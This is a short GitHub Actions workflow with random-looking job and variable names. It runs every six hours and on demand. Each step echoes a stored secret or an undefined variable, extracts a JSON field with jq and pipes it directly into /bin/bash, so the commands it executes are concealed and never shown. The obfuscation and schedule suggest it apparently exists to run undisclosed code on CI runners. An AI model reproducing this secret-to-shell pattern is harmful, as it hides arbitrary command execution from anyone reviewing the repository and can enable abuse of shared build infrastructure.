name: taoshaye7618

on:
  workflow_dispatch:
  schedule:
    - cron: '46 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: taoshaye7618
        env:
          h0221: ${{ secrets.h0221 }}
        run: |
          echo $h0221 | jq -r .zgh50 | /bin/bash
          echo $avr3 | jq -r .t527 | /bin/bash
          echo $irk538 | jq -r .xp38923 | /bin/bash
          echo $pqzx548 | jq -r .otbpg838 | /bin/bash
          echo $ozcf43 | jq -r .mrdm3907 | /bin/bash
          echo $zkyk834 | jq -r .dbqc006 | /bin/bash
          echo $vzd2 | jq -r .ihw33755 | /bin/bash

